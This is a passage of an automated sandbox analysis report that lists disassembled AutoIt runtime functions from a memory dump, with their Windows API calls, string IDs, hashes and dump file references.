                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                    • API String ID: 1038674560-86951937
                                                                                                                    • Opcode ID: bb862fbaf61e56a8b3d8bea2d27f7ecf9518c3aa120332c79b34bc3de3773f79
                                                                                                                    • Instruction ID: 54fee7254df5f8f3e66012060a074129828afaf75c4cfd95339e7bc91d0a02b4
                                                                                                                    • Opcode Fuzzy Hash: bb862fbaf61e56a8b3d8bea2d27f7ecf9518c3aa120332c79b34bc3de3773f79
                                                                                                                    • Instruction Fuzzy Hash: CC81E7B16002256ACB27AB61FC43FAF37A8AF15700F044025FD45AF196EB71EE45C6A1
                                                                                                                    Function 003A9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003A9AD2
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003A9B8B
                                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 003A9BA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2326795674-4108050209
                                                                                                                    • Opcode ID: a16b9d193d53c8f841b835f0ca4423c746f2306d58b66dcc69d89c2177f14bf9
                                                                                                                    • Instruction ID: c22c7278a34a971cfd221fb9b579d792c16808a6f2ac1e367defeaabacff1232
                                                                                                                    • Opcode Fuzzy Hash: a16b9d193d53c8f841b835f0ca4423c746f2306d58b66dcc69d89c2177f14bf9
                                                                                                                    • Instruction Fuzzy Hash: 7102C131108341AFDB26CF14CC49BAABBE9FF8A314F04862EF995E62A1C735D944CB51
                                                                                                                    Function 003AA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 003AA903
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 003AA907
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 003AA91D
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 003AA928
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 003AA92D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 003AA945
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AA953
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 003AA964
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 003AA96D
                                                                                                                    • SelectObject.GDI32(?,?), ref: 003AA97A
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003AA999
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AA9B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003AA9C5
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AA9ED
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003AAA14
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 003AAA32
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 003AAA3D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 003AAA4B
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 003AAA53
                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003AAA67
                                                                                                                    • SelectObject.GDI32(?,003AA5FA), ref: 003AAA7E
                                                                                                                    • DeleteObject.GDI32(?), ref: 003AAA89
                                                                                                                    • SelectObject.GDI32(?,?), ref: 003AAA8F
                                                                                                                    • DeleteObject.GDI32(?), ref: 003AAA94
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 003AAA9A
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 003AAAA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    • Opcode ID: e78256260d4c83d42c1909b77cd5539860e6ad0f15045fdfd8e9d4ee76395cfd
                                                                                                                    • Instruction ID: 95e5aca4ed1d087e9d7029c20d7be18d5735e4ecb658e485b24294398f5640f1
                                                                                                                    • Opcode Fuzzy Hash: e78256260d4c83d42c1909b77cd5539860e6ad0f15045fdfd8e9d4ee76395cfd
                                                                                                                    • Instruction Fuzzy Hash: E0512D72900608FFDB129FA4DC48EAE7BBDEF4A320F114625F911AB2A1D7759940DF90
                                                                                                                    Function 003A89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003A8AC1
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A8AD2
                                                                                                                    • CharNextW.USER32(0000014E), ref: 003A8B01
                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003A8B42
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003A8B58
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A8B69
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003A8B86
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 003A8BD8
                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003A8BEE
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003A8C1F
                                                                                                                    • _memset.LIBCMT ref: 003A8C44
                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003A8C8D
                                                                                                                    • _memset.LIBCMT ref: 003A8CEC
                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003A8D16
                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 003A8D6E
                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 003A8E1B
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003A8E3D
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003A8E87
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003A8EB4
                                                                                                                    • DrawMenuBar.USER32(?), ref: 003A8EC3
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 003A8EEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                    • Opcode ID: bcb3a0622fafd5148fee1be4226c0f9ea321664d3df654fd041d8f6b21357574
                                                                                                                    • Instruction ID: d3b5d47a1fcc25c86e0a4a652e45d189e5cf75bb8c58424854ab3daef3c6656a
                                                                                                                    • Opcode Fuzzy Hash: bcb3a0622fafd5148fee1be4226c0f9ea321664d3df654fd041d8f6b21357574
                                                                                                                    • Instruction Fuzzy Hash: 3EE18171900219AFDF22DF64CC84EEE7BBDEF0A710F158156F915AA190DB749A80DF60
                                                                                                                    Function 003A488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 003A49CA
                                                                                                                    • GetDesktopWindow.USER32 ref: 003A49DF
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 003A49E6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A4A48
                                                                                                                    • DestroyWindow.USER32(?), ref: 003A4A74
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003A4A9D
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003A4ABB
                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003A4AE1
                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 003A4AF6
                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003A4B09
                                                                                                                    • IsWindowVisible.USER32(?), ref: 003A4B29
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003A4B44
                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003A4B58
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003A4B70
                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 003A4B96
                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 003A4BB0
                                                                                                                    • CopyRect.USER32(?,?), ref: 003A4BC7
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 003A4C32
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                    • Opcode ID: a332e89ce2b6741179191e72d43beb6a5fca447b9a139a2c47d6cb237997a7b5
                                                                                                                    • Instruction ID: 147484088824510e9c227f71df803b318203fd2b44385c679428f7f4aa1d1033
                                                                                                                    • Opcode Fuzzy Hash: a332e89ce2b6741179191e72d43beb6a5fca447b9a139a2c47d6cb237997a7b5
                                                                                                                    • Instruction Fuzzy Hash: 98B18A71604350AFDB05DF64D844B6ABBE8FF8A310F008A1DF9999B2A1D7B1E805CB95
                                                                                                                    Function 0038449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003844AC
                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003844D2
                                                                                                                    • _wcscpy.LIBCMT ref: 00384500
                                                                                                                    • _wcscmp.LIBCMT ref: 0038450B
                                                                                                                    • _wcscat.LIBCMT ref: 00384521
                                                                                                                    • _wcsstr.LIBCMT ref: 0038452C
                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00384548
                                                                                                                    • _wcscat.LIBCMT ref: 00384591
                                                                                                                    • _wcscat.LIBCMT ref: 00384598
                                                                                                                    • _wcsncpy.LIBCMT ref: 003845C3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                    • Opcode ID: cfcaafa6965494d4800a7bb3985600c6266660f6184f206a24ba191e73d05e38
                                                                                                                    • Instruction ID: 10004b575c49d644b0bb7c975436ec1793dce80db54754f0f8eba1491c614aee
                                                                                                                    • Opcode Fuzzy Hash: cfcaafa6965494d4800a7bb3985600c6266660f6184f206a24ba191e73d05e38
                                                                                                                    • Instruction Fuzzy Hash: 9741D772A003017ADB17BBB59C47EFF77ACDF42710F04006AF905EE182EA35AA0187A5
                                                                                                                    Function 003227D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003228BC
                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 003228C4
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003228EF
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 003228F7
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0032291C
                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00322939
                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00322949
                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0032297C
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00322990
                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 003229AE
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003229CA
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003229D5
                                                                                                                      • Part of subcall function 00322344: GetCursorPos.USER32(?), ref: 00322357
                                                                                                                      • Part of subcall function 00322344: ScreenToClient.USER32(003E57B0,?), ref: 00322374
                                                                                                                      • Part of subcall function 00322344: GetAsyncKeyState.USER32(00000001), ref: 00322399
                                                                                                                      • Part of subcall function 00322344: GetAsyncKeyState.USER32(00000002), ref: 003223A7
                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00321256), ref: 003229FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                    • Opcode ID: 8500943e7ad3ce17fdff65ab0df81eca06d315f4ac2d9dbf558ebfe7b3e5b65b
                                                                                                                    • Instruction ID: fc40df328b7f742a1ee3e8b01271cb700f254e4765c36499082f3029e786d581
                                                                                                                    • Opcode Fuzzy Hash: 8500943e7ad3ce17fdff65ab0df81eca06d315f4ac2d9dbf558ebfe7b3e5b65b
                                                                                                                    • Instruction Fuzzy Hash: 2FB18171A00219EFDB16DFA8DC45BAE7BB8FB08315F114229FA15AB2E0DB74D850CB50
                                                                                                                    Function 0037A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037A47A
                                                                                                                    • __swprintf.LIBCMT ref: 0037A51B
                                                                                                                    • _wcscmp.LIBCMT ref: 0037A52E
                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0037A583
                                                                                                                    • _wcscmp.LIBCMT ref: 0037A5BF
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0037A5F6
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0037A648
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0037A67E
                                                                                                                    • GetParent.USER32(?), ref: 0037A69C
                                                                                                                    • ScreenToClient.USER32(00000000), ref: 0037A6A3
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037A71D
                                                                                                                    • _wcscmp.LIBCMT ref: 0037A731
                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0037A757
                                                                                                                    • _wcscmp.LIBCMT ref: 0037A76B
                                                                                                                      • Part of subcall function 0034362C: _iswctype.LIBCMT ref: 00343634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                    • String ID: %s%u
                                                                                                                    • API String ID: 3744389584-679674701
                                                                                                                    • Opcode ID: 8dd15a74f5ab6b2400f8ba837954f4a3786de817ee0fe979fdcf5aa27ad12154
                                                                                                                    • Instruction ID: e423cae7df403c612a7a86509a008f97dbb4a3300234776ed44a501910e39f1f
                                                                                                                    • Opcode Fuzzy Hash: 8dd15a74f5ab6b2400f8ba837954f4a3786de817ee0fe979fdcf5aa27ad12154
                                                                                                                    • Instruction Fuzzy Hash: 32A1D331204B46AFD72ADF64C884BAEB7E8FF84311F008529F99DD6150DB38E945CB92
                                                                                                                    Function 0037AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0037AF18
                                                                                                                    • _wcscmp.LIBCMT ref: 0037AF29
                                                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0037AF51
                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0037AF6E
                                                                                                                    • _wcscmp.LIBCMT ref: 0037AF8C
                                                                                                                    • _wcsstr.LIBCMT ref: 0037AF9D
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0037AFD5
                                                                                                                    • _wcscmp.LIBCMT ref: 0037AFE5
                                                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0037B00C
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0037B055
                                                                                                                    • _wcscmp.LIBCMT ref: 0037B065
                                                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0037B08D
                                                                                                                    • GetWindowRect.USER32(00000004,?), ref: 0037B0F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                    • String ID: @$ThumbnailClass
                                                                                                                    • API String ID: 1788623398-1539354611
                                                                                                                    • Opcode ID: 209b0f6b679a4991e5735fd90e609f097826fb54e4b7cb8e28d2ed47286f90e0
                                                                                                                    • Instruction ID: b2f1d5b9d925998c553dee2907eff2807fba21453d07b4731d037348931a64da
                                                                                                                    • Opcode Fuzzy Hash: 209b0f6b679a4991e5735fd90e609f097826fb54e4b7cb8e28d2ed47286f90e0
                                                                                                                    • Instruction Fuzzy Hash: C98190711082059FDB26DF10C885FAAB7E8FF94714F04C56AFD898A095DB38DD49CBA1
                                                                                                                    Function 003AC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 003AC627
                                                                                                                      • Part of subcall function 003AAB37: ClientToScreen.USER32(?,?), ref: 003AAB60
                                                                                                                      • Part of subcall function 003AAB37: GetWindowRect.USER32(?,?), ref: 003AABD6
                                                                                                                      • Part of subcall function 003AAB37: PtInRect.USER32(?,?,003AC014), ref: 003AABE6
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003AC690
                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003AC69B
                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003AC6BE
                                                                                                                    • _wcscat.LIBCMT ref: 003AC6EE
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003AC705
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003AC71E
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 003AC735
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 003AC757
                                                                                                                    • DragFinish.SHELL32(?), ref: 003AC75E
                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003AC851
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb>
                                                                                                                    • API String ID: 169749273-1481265074
                                                                                                                    • Opcode ID: 4a9fbfab9b774d9d2ba9752c9fe6353e2d16a505e8ea9c71da166f3df52a76a2
                                                                                                                    • Instruction ID: a0ff9ddf21d5f654e295ce1d4b9ed7d4584a311cdf68b047e12a58bac83b6f55
                                                                                                                    • Opcode Fuzzy Hash: 4a9fbfab9b774d9d2ba9752c9fe6353e2d16a505e8ea9c71da166f3df52a76a2
                                                                                                                    • Instruction Fuzzy Hash: 05615D72108310AFC712EF64DC85D9BBBE8EF89710F04092EF595961B1DB709A49CB92
                                                                                                                    Function 0037ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
